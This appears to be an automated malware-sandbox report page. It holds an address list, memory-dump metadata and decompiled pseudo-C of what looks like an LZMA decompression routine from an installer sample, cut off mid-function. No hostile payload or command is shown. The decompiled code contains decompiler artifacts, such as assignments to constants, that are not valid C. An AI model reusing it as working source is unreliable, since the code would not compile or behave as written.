0x00406bf5
0x00406bf9
0x00406c17
0x00406c1a
0x00406c21
0x00406c24
0x00406c27
0x00406c2a
0x00406c2d
0x00406c30
0x00406c32
0x00406c39
0x00406c3a
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c45
0x00406c4a
0x00000000
0x00406c4a
0x00406bfb
0x00406bfe
0x00406c01
0x00406c0b
0x00000000
0x00000000
0x00406c5f
0x00406c63
0x00406c86
0x00406c89
0x00406c8c
0x00406c96
0x00406c65
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c7b
0x00406c7e
0x00406c7e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d13
0x00406d17
0x00406d1e
0x00406d21
0x00406d24
0x00406d2e
0x00000000
0x00406d2e
0x00406d19
0x00000000
0x00000000
0x00406d3a
0x00406d3e
0x00406d45
0x00406d48
0x00406d4b
0x00406d40
0x00406d40
0x00406d40
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d57
0x00406d5a
0x00000000
0x00000000
0x00406dfa
0x00406dfa
0x00406dfe
0x0040719c
0x00000000
0x0040719c
0x00406e04
0x00406e07
0x00406e0a
0x00406e0e
0x00406e11
0x00406e17
0x00406e19
0x00406e19
0x00406e19
0x00406e1c
0x00406e1f
0x00000000
0x00000000
0x004069ef
0x004069ef
0x004069f3
0x00407160
0x00000000
0x00407160
0x004069f9
0x004069fc
0x004069ff
0x00406a03
0x00406a06
0x00406a0c
0x00406a0e
0x00406a0e
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a17
0x00406a1a
0x00000000
0x00000000
0x00406a20
0x00406a26
0x00000000
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x00406a33
0x00406a36
0x00406a39
0x00406a3c
0x00406a3d
0x00406a40
0x00406a42
0x00406a48
0x00406a4b
0x00406a4e
0x00406a51
0x00406a54
0x00406a57
0x00406a5a
0x00406a76
0x00406a79
0x00406a7c
0x00406a7f
0x00406a86
0x00406a8a
0x00406a8c
0x00406a90
0x00406a5c
0x00406a5c
0x00406a60
0x00406a68
0x00406a6d
0x00406a6f
0x00406a71
0x00406a71
0x00406a93
0x00406a9a
0x00406a9d
0x00000000
0x00406aa3
0x00000000
0x00406aa3
0x00000000
0x00406aa8
0x00406aa8
0x00406aac
0x0040716c
0x00000000
0x0040716c
0x00406ab2
0x00406ab5
0x00406ab8
0x00406abc
0x00406abf
0x00406ac5
0x00406ac7
0x00406ac7
0x00406ac7
0x00406aca
0x00406acd
0x00406acd
0x00406acd
0x00406ad3
0x00000000
0x00000000
0x00406ad5
0x00406ad8
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae7
0x00406aea
0x00406aed
0x00406af0
0x00406af3
0x00406b0b
0x00406b0e
0x00406b11
0x00406b14
0x00406b14
0x00406b17
0x00406b1b
0x00406b1d
0x00406af5
0x00406af5
0x00406afd
0x00406b02
0x00406b04
0x00406b06
0x00406b06
0x00406b20
0x00406b27
0x00406b2a
0x00000000
0x00406b2c
0x00000000
0x00406b2c
0x00406b2a
0x00406b31
0x00406b31
0x00406b31
0x00406b31
0x00000000
0x00000000
0x00406b6c
0x00406b6c
0x00406b70
0x00407178
0x00000000
0x00407178
0x00406b76
0x00406b79
0x00406b7c
0x00406b80
0x00406b83
0x00406b89
0x00406b8b
0x00406b8b
0x00406b8b
0x00406b8e
0x00406b91
0x00406b91
0x00406b97
0x00406b35
0x00406b35
0x00406b38
0x00000000
0x00406b38
0x00406b99
0x00406b99
0x00406b9c
0x00406b9f
0x00406ba2
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb7
0x00406bcf
0x00406bd2
0x00406bd5
0x00406bd8
0x00406bd8
0x00406bdb
0x00406bdf
0x00406be1
0x00406bb9
0x00406bb9
0x00406bc1
0x00406bc6
0x00406bc8
0x00406bca
0x00406bca
0x00406be4
0x00406beb
0x00406bee
0x00000000
0x00406bf0
0x00000000
0x00406bf0
0x00000000
0x00406e7d
0x00406e7d
0x00406e81
0x004071a8
0x00000000
0x004071a8
0x00406e87
0x00406e8a
0x00406e8d
0x00406e91
0x00406e94
0x00406e9a
0x00406e9c
0x00406e9c
0x00406e9c
0x00406e9f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f8c
0x00406f90
0x00406fb2
0x00406fb5
0x00406fbf
0x00000000
0x00406fbf
0x00406f92
0x00406f95
0x00406f99
0x00406f9c
0x00406f9c
0x00406f9f
0x00000000
0x00000000
0x00407049
0x0040704d
0x0040706b
0x0040706b
0x0040706b
0x00407072
0x00407079
0x00407080
0x00407080
0x00000000
0x00407080
0x0040704f
0x00407052
0x00407055
0x00407058
0x0040705f
0x00406fa3
0x00406fa3
0x00406fa6
0x00000000
0x00000000
0x0040713a
0x0040713d
0x00000000
0x00000000
0x00406d74
0x00406d76
0x00406d7d
0x00406d7e
0x00406d80
0x00406d83
0x00000000
0x00000000
0x00406d8b
0x00406d8e
0x00406d91
0x00406d93
0x00406d95
0x00406d95
0x00406d96
0x00406d99
0x00406da0
0x00406da3
0x00406db1
0x00000000
0x00000000
0x00407087
0x00407087
0x0040708a
0x00407091
0x00000000
0x00000000
0x00407096
0x00407096
0x0040709a
0x004071d2
0x00000000
0x004071d2
0x004070a0
0x004070a3
0x004070a6
0x004070aa
0x004070ad
0x004070b3
0x004070b5
0x004070b5
0x004070b5
0x004070b8
0x004070bb
0x004070bb
0x004070bb
0x004070bb
0x004070be
0x004070be
0x004070c2
0x00407122
0x00407125
0x0040712a
0x0040712b
0x0040712d
0x0040712f
0x00407132
0x00000000
0x00407132
0x004070c4
0x004070ca
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e5
0x004070fe
0x00407101
0x00407104
0x00407107
0x0040710b
0x0040710d
0x0040710d
0x0040710e
0x00407111
0x004070e7
0x004070e7
0x004070ef
0x004070f4
0x004070f6
0x004070f9
0x004070f9
0x00407114
0x0040711b
0x00000000
0x0040711d
0x00000000
0x0040711d
0x00000000
0x00406db9
0x00406dbc
0x00406df2
0x00406f22
0x00406f22
0x00406f22
0x00406f22
0x00406f25
0x00406f25
0x00406f28
0x00406f2a
0x004071b4
0x00000000
0x004071b4
0x00406f30
0x00406f33
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f40
0x00406f40
0x00406f40
0x00000000
0x00406f40
0x00406dbe
0x00406dc0
0x00406dc2
0x00406dc4
0x00406dc7
0x00406dc8
0x00406dca
0x00406dcc
0x00406dcf
0x00406dd2
0x00406de8
0x00406ded
0x00406e25
0x00406e25
0x00406e29
0x00406e55
0x00406e57
0x00406e5e
0x00406e61
0x00406e64
0x00406e64
0x00406e69
0x00406e69
0x00406e6b
0x00406e6e
0x00406e75
0x00406e78
0x00406ea5
0x00406ea5
0x00406ea8
0x00406eab
0x00406f1f
0x00406f1f
0x00406f1f
0x00000000
0x00406f1f
0x00406ead
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec8
0x00406ecb
0x00406ece
0x00406ee7
0x00406ee9
0x00406eec
0x00406eed
0x00406ef0
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406efc
0x00406efe
0x00406f01
0x00406f05
0x00406f07
0x00406f07
0x00406f08
0x00406f0b
0x00406f0e
0x00406ed0
0x00406ed0
0x00406ed8
0x00406edd
0x00406edf
0x00406ee2
0x00406ee2
0x00406f11
0x00406f18
0x00406ea2
0x00406ea2
0x00406ea2
0x00406ea2
0x00000000
0x00406f1a
0x00000000
0x00406f1a
0x00406f18
0x00406e2b
0x00406e2e
0x00406e30
0x00406e33
0x00406e36
0x00406e39
0x00406e3b
0x00406e3e
0x00406e41
0x00406e41
0x00406e44
0x00406e44
0x00406e47
0x00406e4e
0x00406e22
0x00406e22
0x00406e22
0x00406e22
0x00000000
0x00406e50
0x00000000
0x00406e50
0x00406e4e
0x00406dd4
0x00406dd7
0x00406dd9
0x00406ddc
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407184
0x00000000
0x00407184
0x00406b45
0x00406b48
0x00406b4b
0x00406b4e
0x00406b51
0x00406b54
0x00406b57
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b64
0x00406b64
0x00406b64
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f43
0x00406f43
0x00406f43
0x00406f47
0x00000000
0x00000000
0x00406f4d
0x00406f50
0x00406f53
0x00406f56
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5e
0x00406f61
0x00406f64
0x00406f67
0x00406f6a
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00406f70
0x00406f73
0x00406f76
0x00406f79
0x00406f7c
0x00406f80
0x00406f82
0x00406f85
0x00000000
0x00406f87
0x00000000
0x00406f87
0x00406f85
0x004071ba
0x00000000
0x00000000
0x004067e9

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55

Uniqueness

Uniqueness Score: -1.00%

Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004067A7(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004071F9))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8); // executed
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
